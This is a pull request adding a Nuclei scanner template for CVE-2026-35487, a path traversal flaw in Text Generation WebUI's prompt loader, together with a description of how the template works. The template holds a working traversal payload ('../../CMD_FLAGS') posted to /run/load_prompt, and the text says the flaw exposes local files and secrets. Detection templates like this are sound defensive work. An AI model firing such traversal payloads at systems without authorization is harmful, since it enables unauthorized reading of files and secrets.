### PR TITLE
Add CVE-2026-35487 Text Generation WebUI prompt path traversal

### DIFF
--- a/http/cves/2026/CVE-2026-35487.yaml
+++ b/http/cves/2026/CVE-2026-35487.yaml
@@ -1,0 +1,54 @@
+id: CVE-2026-35487
+
+info:
+  name: oobabooga Text Generation WebUI < 4.3.3 - Path Traversal in Prompt Loader
+  author: str4k3r
+  severity: high
+  description: |
+    Text Generation WebUI before the v4.3.3 fix appends a user-controlled
+    prompt name directly to the notebook path. An unauthenticated Gradio
+    callback therefore reads a predictable file outside the notebook
+    directory. This template uses the benign, application-shipped
+    user_data/CMD_FLAGS.txt marker and does not request a system secret.
+
+    The vulnerable/fixed targets were built from the official upstream v4.3.2
+    and v4.3.3 source tags because no official versioned OCI images were
+    available. Use a source-built deployment with the shipped file described
+    below.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-35487
+    - https://github.com/oobabooga/text-generation-webui
+    - https://github.com/oobabooga/textgen/wiki/09-%E2%80%90-Docker
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 8.2
+    cve-id: CVE-2026-35487
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 1
+    product: text-generation-webui
+    vendor: oobabooga
+  tags: cve,cve2026,path-traversal,file-read,textgen,unauth
+
+http:
+  - raw:
+      - |
+        POST /run/load_prompt HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"data":["{{prompt_name}}"]}
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "{{marker}}"
+
+variables:
+  prompt_name: "../../CMD_FLAGS"
+  marker: "# Add persistent flags here"


### PR DESCRIPTION
## Vulnerability
Text Generation WebUI 4.3.2 joins the `/run/load_prompt` prompt name with the prompt directory without rejecting traversal. Version 4.3.3 constrains the path to the prompt directory.

## Template behavior
The template posts a traversal prompt name and matches a caller-supplied marker from `user_data/CMD_FLAGS.txt`. It uses the application’s JSON endpoint and does not upload or alter files.

## Required configuration
Use a source-built Text Generation WebUI 4.3.2-style deployment where `user_data/CMD_FLAGS.txt` exists. Set `prompt_name` to the traversal value and `marker` to a known harmless line from that file; official OCI images may not contain the required file.

## Impact
An unauthenticated user can read local files accessible to the WebUI process, including launch configuration and secrets.

## Usage
```bash
nuclei -u <authorized-target> -t http/cves/2026/CVE-2026-35487.yaml -var prompt_name=<traversal-prompt> -var marker=<expected-marker>
```

Run this template only against systems and test accounts you own or are explicitly authorized to assess.
